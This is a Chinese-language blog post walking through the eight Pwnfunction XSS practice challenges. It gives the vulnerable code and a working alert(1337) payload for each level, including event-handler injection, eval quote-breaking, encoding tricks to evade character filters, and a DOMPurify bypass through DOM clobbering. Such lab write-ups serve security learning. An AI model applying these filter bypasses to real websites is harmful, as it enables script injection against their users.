Pass Pwnfunction XSS

最新推荐文章于 2024-08-18 18:22:45 发布
最新推荐文章于 2024-08-18 18:22:45 发布
阅读量674 收藏 17
点赞数 22
文章标签: xss 前端 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0Sick_/article/details/141278703
版权

目录

Rule

1.Ma Spaghet!

2.Jefff

3.Ugandan Knuckles

4.Ricardo Milos

5.Ah That's Hawt

6.Ligma

7.Mafia

8.Ok, Boomer

Thanks Watching

All Down

Rule

        Pop an alert(1337)

        No user interaction

1.Ma Spaghet!

Code

<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

Pass

        使用img标签的报错进行alert

?somebody=<img src=1 onerror="alert(1337)">

2.Jefff

Code

<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

Pass

        因为是eval,利用双引号闭合传入的name再接上alert并闭合后面的双引号即可

?jeff=a";alert(1337);"
?jeff=a"-alert(1337)-"
// JavaScript中也可以使用-来连接

3.Ugandan Knuckles

Code

<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

Pass

        input标签可以闭合在用户不介入的情况下可以使用autofocus自动对焦触发

?wey=a" onfocus="alert(1337)" autofocus="""

4.Ricardo Milos

Code

<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

Pass

        此处会接受ricardo的参数传递到action并在2s之后自动执行因此可以

?ricardo=javascript:alert(1337)

5.Ah That's Hawt

Code

<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

Pass

        很多的符号被过滤了可以使用img再使用location格式化为字符串

?markassbrownlee=<img src=1 onerror=location="javascript:alert%25281337%2529">

6.Ligma

Code

  <script>
    balls = new URL(location).searchParams.get("balls") || "Ninja has Ligma";
    balls = balls.replace(/[A-Za-z0-9]/g, "");
    eval(balls);
  </script>

Pass

        过滤了字母和数字可以使用编码,如JSFuck

?balls=经过编码的alert(1337)

7.Mafia

Code

  <script>
    mafia = (new URL(location).searchParams.get('mafia') || '1+1')
    mafia = mafia.slice(0, 50)
    mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
    mafia = mafia.replace(/(alert|confirm|prompt)/g, '_')
    eval(mafia)
  </script>

Pass

        过滤许多字符并且限制了长度为50

        Way-1

        我们可以使用构造函数由于没过滤大写,可以先传入大写再使用toLowerCase转小写执行(因为JS严格区分大小写)

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

        Way-2

        可以使用parseInt将alert转成进制数再由toString转回来

parseInt('alert', 30)
// 8680439
8680439..toString(30)
// alert

至此构建我们的payload

?mafia=eval(8680439..toString(30))(1337)

        Way-3

        可以使用location.hash.slice(1)截取#后的传值

?mafia=eval(location.hash.slice(1))#alert(1337)

8.Ok, Boomer

Code

<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

Pass

        利用a标签传递id为ok的href到setTimeout(因为herf会自己toString),再使用DOMPurify白名单的协议绕过过滤,即

?boomer=<a id="ok" href="javascript:alert(1337)">
// javascript被DomPurity过滤
?boomer=<a id="ok" href="cid:alert(1337)">
// 使用白名单里的协议即可

Thanks Watching

All Down

s0Sick_
关注
  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss.pwnfunction靶场
newlife1441的博客
07-31 960
靶场是验证我们学习情况和提升做题技巧很好的平台,这里将为大家介绍一个非常不错的xss靶场XSSGamehttps。
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss.pwnfunction-Jefff
weixin_63750160的博客
04-06 418
在eval中``可以直接执行命令所以直接把"直接闭合在结尾再加上一个"因为后面的"没闭和会报错。
xss.pwnfunction-Ugandan Knuckles
weixin_63750160的博客
04-06 426
这个是把过滤掉了所以只能用js的事件。
xss.pwnfunction-Ricardo Milos
weixin_63750160的博客
04-06 107
【代码】xss.pwnfunction-Ricardo Milos。
xss.pwnfunction.com靶机 Warmups
CvtNhso的博客
03-07 996
通关要求弹出警告框alert(1337)没有用户交互不能使用外链接在chrome中测试。
xss.pwnfunction-Ma Spaghet!
weixin_63750160的博客
04-06 322
js并没有执行因为 HTML5中指定不执行由innerHTML插入的标签。这个是根据get传参的并且是由someboby来接收参数的。
XSS漏洞
zhoutong2323的博客
04-19 1683
XSS漏洞(Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时,攻击者就可以利用该漏洞来执行任意的代码,例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。
XSS漏洞利用
2302_79885863的博客
04-01 2265
输出编码主要有URL、HTML、JS可以采用白名单验证或者黑名单验证方法。白名单验证:对用户提交的数据进行格查,只接受指定长度范围内、采用适当格式和预期字符的输入,其余一律过滤黑名单验证:对包含XSS代码特征的内容进行过滤,如"“、“script”、”#"等·对所有输出字符进行HTML编码‘’ 转成& gt;‘&’ 转成& amp;" 转成& quot;’ 转成& #39;
xss.pwnfunction靶场练习(easy难度)
m0_64998040的博客
08-18 160
官方文档显示HTML5中<script>标签被认为可能是跨站脚本而被禁用但是图片底下的<img>仍然可以xss攻击。所以我们使用<img src=‘x’ onerrer=‘alert(1)’>传参,显示警告1337。由上一页代码显示把<和>过滤了,同时这一页也比前两道多了一个可输入方框。使用闭合字段逃逸出eval()函数并执行alert()函数。本题只有2秒自动提交,没有其他过滤,正常写入xss即可。本题过滤了中括号和小括号,将符号进行URL编码。
Xss Scan tool
05-25
Xss Scan工具是一款专为网络安全专业人士设计的插件,它集成在Burp Suite这款流行的网络安全测试平台上,主要用于检测和识别Web应用程序中的XSS(跨站脚本)漏洞。XSS攻击是网络安全领域的一个重要问题,它允许攻击...
springboot整合XSS
03-20
本文将深入探讨如何在Spring Boot项目中整合并预防XSS(Cross-Site Scripting)攻击。XSS是一种常见的网络攻击方式,通过注入恶意脚本到网页中,来窃取用户数据或者执行恶意操作。 一、理解XSS攻击 XSS攻击主要...
java 预防XSS攻击
08-23
Java开发过程中,XSS(Cross Site Scripting)攻击是一种常见的安全威胁,它允许攻击者在用户的浏览器上执行恶意脚本。XSS攻击通常发生在Web应用程序未能充分验证或过滤用户输入的情况下,使得恶意代码能够被嵌入...
edu 后台xss1
08-08
标题“edu 后台xss1”涉及到的是一个教育平台后台系统的XSS(跨站脚本)漏洞。XSS漏洞是网络安全中常见的一个问题,它允许攻击者在目标网站的页面上注入恶意脚本,进而影响到网站的正常用户。在这个案例中,攻击者...
XSS-DOM
最新发布
qq_51502737的博客
08-18 690
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。先注释掉过滤代码,此时正常弹窗。
xss.function靶场(hard)
丁航航的博客
08-18 407
目前啥也不输入,直接进入查看。
XSS的DOM破坏
m0_67441173的博客
08-17 904
@keyframes x{}
xss GAME (xss漏洞攻击1-8)
weixin_65785894的博客
08-18 754
构建一个ALERT(1337) source 是获取函数原码 toLowerCase() 获取小写。,原型为parseInt ( String s , [ int radix ] ),用于解析一个。alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F。分析:innerText=ma 这个代码 将会把你输入的都将转换为文本。就是修改他原来的参数,进行覆盖,最后误以为是正确的。而且有需求,不能有用户参与,而且必须弹窗1337。分析源码可知,没有任何过滤,那直接动手操作即可。
XSS攻击应急响应策略
"XSS应急预案已完成" XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况,使得恶意代码能够注入到网页中,并在其他用户加载页面时执行。这些攻击可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值